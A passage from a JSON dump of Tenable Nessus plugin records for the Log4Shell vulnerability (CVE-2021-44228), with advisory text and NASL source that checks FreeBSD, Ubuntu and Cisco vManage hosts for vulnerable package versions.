value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:graylog\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'graylog<4.2.3'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:50:06", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 4b1ac5a3-5bd4-11ec-8602-589cfc007716 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:opensearch", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "href": "https://www.tenable.com/plugins/nessus/156026", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156026);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 4b1ac5a3-5bd4-11ec-8602-589cfc007716 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://opensearch.org/blog/releases/2021/12/update-to-1-2-1/\");\n # https://vuxml.freebsd.org/freebsd/4b1ac5a3-5bd4-11ec-8602-589cfc007716.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?036fbe2f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opensearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'opensearch<1.2.1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:40:40", "description": "A remote code execution vulnerability exists in VMware Horizon in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-01-07T00:00:00", "type": "nessus", "title": "VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:horizon"], "id": "VMWARE_HORIZON_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156560", "sourceData": "Binary data vmware_horizon_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:07:36", "description": "A remote code execution vulnerability exists in VMWare vCenter in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156035", "sourceData": "Binary data vmware_vcenter_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:44", "description": "Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/o:cisco:sd-wan_firmware", "cpe:/a:cisco:sd-wan_vmanage"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "href": "https://www.tenable.com/plugins/nessus/161212", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161212);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47745\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47745\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\", \"Cisco/Viptela/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '20.3', 'fix_ver' : '20.3.4.1' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.2.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1.1' },\n { 'min_ver' : '20.6', 'fix_ver' : '20.6.2.1' }\n];\n\n \nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCwa47745',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:21:42", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:esm", "p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java"], "id": "UBUNTU_USN-5192-2.NASL", "href": "https://www.tenable.com/plugins/nessus/156161", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5192-2. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156161);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"USN\", value:\"5192-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0597\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the\nUSN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5192-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected liblog4j2-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:esm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '16.04', 'pkgname': 'liblog4j2-java', 'pkgver': '2.4-2ubuntu0.1~esm1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liblog4j2-java');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:49:05", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 515df85a-5cd7-11ec-a16d-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "FreeBSD : bastillion -- log4j vulnerability (515df85a-5cd7-11ec-a16d-001517a2e1a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bastillion", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "href": "https://www.tenable.com/plugins/nessus/156052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156052);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : bastillion -- log4j vulnerability (515df85a-5cd7-11ec-a16d-001517a2e1a4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 515df85a-5cd7-11ec-a16d-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the\n classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # 